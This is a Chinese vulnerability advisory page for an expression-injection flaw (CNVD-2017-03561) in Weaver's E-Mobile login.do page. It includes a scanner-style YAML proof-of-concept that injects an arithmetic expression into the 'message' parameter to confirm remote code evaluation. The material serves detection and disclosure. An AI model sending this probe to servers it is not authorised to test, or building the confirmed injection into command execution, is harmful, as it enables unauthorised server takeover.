CNVD-2017-03561: 泛微 E-Mobile 表达式注入

日期: 2025-09-01 | 影响软件: 泛微E-Mobile | POC: 已公开

漏洞描述

e-mobile是泛微为手机、平板电脑等移动终端的移动办公产品。 上海泛微网络科技股份有限公司e-mobile平台login.do页面存在表达式注入漏洞。允许攻击者远程执行命令,获得服务器权限。 app="泛微-EMobile"

PoC代码[已公开]

id: CNVD-2017-03561

info:
  name: 泛微 E-Mobile 表达式注入
  author: laohuan12138
  severity: high
  verified: true
  description: |
    e-mobile是泛微为手机、平板电脑等移动终端的移动办公产品。
    上海泛微网络科技股份有限公司e-mobile平台login.do页面存在表达式注入漏洞。允许攻击者远程执行命令,获得服务器权限。
    app="泛微-EMobile"
  reference:
  - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
  - https://zhuanlan.zhihu.com/p/26052235

set:
  numa: randomInt(1000, 5000)
  numb: randomInt(5000, 10000)

rules:
  r0:
    request:
      method: GET
      path: '/login.do?message={{numa}}*{{numb}}'
    expression: response.status == 200 && response.body.bcontains(bytes(string(numa * numb)))
expression: r0()

相关漏洞推荐